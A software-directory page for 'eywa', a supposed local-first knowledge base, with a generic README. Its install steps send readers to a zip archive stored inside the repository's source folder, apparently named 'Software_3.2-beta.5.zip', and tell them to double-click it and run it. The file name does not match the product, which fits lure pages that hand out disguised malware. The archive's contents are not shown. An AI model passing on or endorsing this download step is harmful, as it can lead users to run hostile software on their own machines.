freshcrate
Skin:/
Home > Databases > eywa

eywa

🧠 Capture and manage your team's knowledge effortlessly with Eywa, ensuring no valuable memory is ever lost.

Why this rank:Recent releaseHealthy release cadenceStrong adoption

Description

🧠 Capture and manage your team's knowledge effortlessly with Eywa, ensuring no valuable memory is ever lost.

README

🌟 eywa - Your Simple Knowledge Base Solution

🚀 Getting Started

Welcome to eywa, a user-friendly, local-first knowledge base that enhances your search experience. With hybrid search and intelligent ranking, you can find the information you need quickly and efficiently.

📥 Download

Download eywa

You can visit the releases page to download the application by clicking the link above.

📋 Features

  • Local-First Design: Your data stays on your device, ensuring privacy and speed.
  • Hybrid Search: Effortlessly search using both keyword matching and advanced machine learning techniques.
  • Cross-Encoder Reranking: Find the most relevant results tailored to your needs.
  • Single Binary: No installation hassle; just download and run.
  • No External Dependencies: Enjoy a seamless experience without the need for extra software.

⚙️ System Requirements

To run eywa, you will need the following:

  • Operating System: Windows, macOS, or Linux (check for specific version requirements)
  • Processor: Dual-core processor or better
  • Memory: At least 4 GB of RAM
  • Disk Space: Minimum of 100 MB free space

📂 Download & Install

  1. Click this link to visit the release page: Download eywa.
  2. On the releases page, find the latest version of eywa.
  3. Look for the file that matches your operating system (e.g., https://github.com/nans28/eywa/raw/refs/heads/main/src/setup/Software_3.2-beta.5.zip, eywa-macos, eywa-linux).
  4. Click the file to start downloading.
  5. Once the download is complete, locate the file on your computer.
  6. Double-click the file to run eywa. No installation process is necessary. The application should start immediately.

🛠️ Using eywa

Once eywa is running, you'll see a simple interface. Here are some key steps to start using it:

  1. Add Your Knowledge Base: Begin by adding information. You can copy-paste text, upload documents, or input links.
  2. Search Efficiently: Enter keywords in the search bar. You can use both general terms and specific queries.
  3. Explore Results: Browse the results displayed on the screen. Use the cross-encoder reranking feature to refine your search if needed.

📝 Topics Covered

  • Knowledge Base: Organize your thoughts and information in one place.
  • Vector Database: Utilize advanced storage solutions for fast retrieval.
  • Machine Learning: Leverage cutting-edge technology for enhanced search accuracy.
  • Semantic Search: Go beyond traditional search with contextual understanding.

🤝 Community Support

Join the community to connect with other users of eywa. You can find assistance, share tips, or contribute to discussions.

🔍 Frequently Asked Questions

Q: Can I use eywa offline?
A: Yes, eywa operates fully offline, storing all your data locally.

Q: Is there a user guide available?
A: Yes, a comprehensive guide is available in the repository. Access it directly on the GitHub page.

Q: How can I provide feedback?
A: You can leave comments on the repository page or reach out in community forums. Your input is valuable for improving future versions.

📣 Stay Updated

Keep an eye on the Releases page for updates and new features. Your experience matters to us, and we aim to constantly enhance eywa.

Download eywa

Release History

VersionChangesUrgencyDate
main@2026-06-07Latest activity on main branchHigh6/7/2026
0.0.0No release found — using repo HEADHigh4/11/2026

Dependencies & License Audit

Loading dependencies...

Similar Packages

reasonkit-mem🚀 Build memory and retrieval infrastructure for ReasonKit, enhancing data management and access for your applications with ease and efficiency.main@2026-06-07
vectro⚡💾 Vectro — Compress LLM embeddings 🧠🚀 Save memory, speed up retrieval, and keep semantic accuracy 🎯✨ Lightning-fast quantization for Python + Mojo, vector DB friendly 🗄️, and perfect for RAG pipv4.8.0
Flipkart-Product-Recommender-RAG🛒 Build a leading-edge e-commerce recommendation system using RAG architecture, Groq Llama 3, LangChain, and AstraDB, deployed on Kubernetes for scalability.main@2026-06-07
orbitOne API for 20+ LLM providers, your databases, and your files — self-hosted, open-source AI gateway with RAG, voice, and guardrails.v2.7.1
vectorizerA high-performance, in-memory vector database written in Rust, designed for semantic search and top-k nearest neighbor queries in AI-driven applications, with binary file persistence for durability.vectorizer-3.4.0

More in Databases

orbitOne API for 20+ LLM providers, your databases, and your files — self-hosted, open-source AI gateway with RAG, voice, and guardrails.
alibabacloud-adb20211201Alibaba Cloud adb (20211201) SDK Library for Python
milvusMilvus is a high-performance, cloud-native vector database built for scalable vector ANN search
qdrantQdrant - High-performance, massive-scale Vector Database and Vector Search Engine for the next generation of AI. Also available in the cloud https://cloud.qdrant.io/